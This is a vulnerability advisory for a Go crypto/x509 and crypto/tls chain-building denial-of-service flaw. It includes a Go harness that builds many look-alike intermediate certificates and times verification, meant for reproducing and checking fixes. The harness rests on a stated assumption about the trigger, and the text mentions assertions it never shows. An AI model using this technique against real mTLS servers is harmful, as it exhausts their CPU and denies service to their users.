Go Crypto/X.509 and Crypto/TLS Excessive Chain-Building Work Denial-of-Service Vulnerability

Vulnerability

A denial-of-service vulnerability has been identified in the Go standard library, specifically in the crypto/x509 and crypto/tls packages. The issue is in certificate chain building: the work that x509.Certificate.Verify performs while searching for a path from a leaf to a trusted root is not bounded tightly enough. When a large number of intermediate certificates is supplied through VerifyOptions.Intermediates, and many of them look like plausible parents of the same child (matching issuer name and key identifier), the chain builder can spend far more CPU than a well-formed chain would ever need. Affected versions are Go releases prior to 1.25.9 and Go 1.26.0 up to but not including 1.26.2.

Impact

Exploitation causes a large increase in CPU usage during certificate chain verification, which amounts to a denial of service for the verifying process. In TLS the issue is easier to reach when a server is configured to verify client certificates: crypto/tls hands the certificates presented in the peer's Certificate message to the verifier as the intermediate pool, so a client that has not yet been authenticated controls how many candidate intermediates the server must consider.

Reproduction

The vulnerability can be reproduced with a mutual-TLS (mTLS) setup in which the server is configured to verify client certificates and the client sends a Certificate message padded with intermediates to just under the TLS certificate-message size limit. It can also be reproduced outside TLS by calling x509.Certificate.Verify with an Intermediates pool that contains many distinct certificates which all appear to be plausible parents of the same child certificate. Whether the non-TLS path is reachable in practice depends on how much attacker-controlled certificate data an application accepts and passes to Verify.
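The following harness builds the non-TLS reproduction scenario described above and times Verify on it. It is an added example, not code from the advisory or the Go project, and it makes an assumption about what "plausible parents for the same child" means: every intermediate carries the leaf's issuer name, the same SubjectKeyId, and the same public key, so each one passes the chain builder's name and key-identifier matching and its signature check. The names (Test Root, Test Intermediate), the helper functions and the default pool size of 200 are this example's own choices.

```go
package main

import (
	"crypto/ecdsa"
	"crypto/elliptic"
	"crypto/rand"
	"crypto/x509"
	"crypto/x509/pkix"
	"fmt"
	"math/big"
	"time"
)

// Fixture holds one constructed leaf plus the root and intermediate pools used to verify it.
type Fixture struct {
	Leaf, Root           *x509.Certificate
	Roots, Intermediates *x509.CertPool
}

func genKey() *ecdsa.PrivateKey {
	k, err := ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
	if err != nil {
		panic(err)
	}
	return k
}

// mkCert signs tmpl under parent with signer and returns the parsed certificate.
func mkCert(tmpl, parent *x509.Certificate, pub *ecdsa.PublicKey, signer *ecdsa.PrivateKey) *x509.Certificate {
	der, err := x509.CreateCertificate(rand.Reader, tmpl, parent, pub, signer)
	if err != nil {
		panic(err)
	}
	c, err := x509.ParseCertificate(der)
	if err != nil {
		panic(err)
	}
	return c
}

// BuildPlausibleParents creates a trusted root, n distinct intermediates that
// share the subject "Test Intermediate", SubjectKeyId {2} and one public key
// (assumption: this is what makes them all plausible parents), and a client
// leaf signed by that shared intermediate key.
func BuildPlausibleParents(n int) Fixture {
	now := time.Now()
	caTmpl := func(serial int64, cn string, ski byte) *x509.Certificate {
		return &x509.Certificate{
			SerialNumber: big.NewInt(serial), Subject: pkix.Name{CommonName: cn},
			NotBefore: now.Add(-time.Hour), NotAfter: now.Add(24 * time.Hour),
			IsCA: true, BasicConstraintsValid: true,
			KeyUsage: x509.KeyUsageCertSign, SubjectKeyId: []byte{ski},
		}
	}
	rootKey := genKey()
	root := mkCert(caTmpl(1, "Test Root", 1), caTmpl(1, "Test Root", 1), &rootKey.PublicKey, rootKey)
	roots := x509.NewCertPool()
	roots.AddCert(root)

	icaKey := genKey() // one key shared by every intermediate
	inters := x509.NewCertPool()
	var first *x509.Certificate
	for i := 0; i < n; i++ {
		// Distinct serial numbers make the certificates distinct to the chain builder.
		ica := mkCert(caTmpl(int64(1000+i), "Test Intermediate", 2), root, &icaKey.PublicKey, rootKey)
		if first == nil {
			first = ica
		}
		inters.AddCert(ica)
	}

	leafKey := genKey()
	leaf := mkCert(&x509.Certificate{
		SerialNumber: big.NewInt(5000), Subject: pkix.Name{CommonName: "client"},
		NotBefore: now.Add(-time.Hour), NotAfter: now.Add(24 * time.Hour),
		KeyUsage:    x509.KeyUsageDigitalSignature,
		ExtKeyUsage: []x509.ExtKeyUsage{x509.ExtKeyUsageClientAuth},
	}, first, &leafKey.PublicKey, icaKey)
	return Fixture{Leaf: leaf, Root: root, Roots: roots, Intermediates: inters}
}

// VerifyTimed runs chain building the way an mTLS server would (client-auth EKU)
// and reports the chains found and the wall-clock time spent.
func VerifyTimed(f Fixture) ([][]*x509.Certificate, time.Duration, error) {
	start := time.Now()
	chains, err := f.Leaf.Verify(x509.VerifyOptions{
		Roots: f.Roots, Intermediates: f.Intermediates,
		KeyUsages: []x509.ExtKeyUsage{x509.ExtKeyUsageClientAuth},
	})
	return chains, time.Since(start), err
}

func main() {
	f := BuildPlausibleParents(200)
	chains, elapsed, err := VerifyTimed(f)
	fmt.Printf("chains=%d elapsed=%s err=%v\n", len(chains), elapsed, err)
}
```

Run the same binary under the toolchain you ship with and under 1.25.9 or 1.26.2 and compare the elapsed time as the pool size grows; a fixed toolchain should keep the cost roughly flat rather than growing with the number of candidate parents. The assertions below only check that verification succeeds and that every chain is leaf, intermediate, root, since the absolute timing depends on the machine and toolchain.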

Remediation

Users should upgrade to Go 1.26.2 or 1.25.9, both of which include the fix, and rebuild and redeploy affected binaries, since the fix lives in the standard library compiled into each program. Download instructions are available on the Go website. To confirm the toolchain in use, run `go version`; the govulncheck tool (golang.org/x/vuln/cmd/govulncheck) reports known standard-library vulnerabilities for a module or binary and can be used to confirm that the rebuilt artifacts no longer reference the affected versions.

Added: Apr 8, 2026, 2:25 AM
Updated: Apr 8, 2026, 2:25 AM

Vulnerability Rating

Custom Algorithm
spread: 0.0
impact: 2.5
exploitability: 8.4
remediation: 0.0
relevance: 5.5
threat: 4.8
urgency: 2.9
incentive: 4.2

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.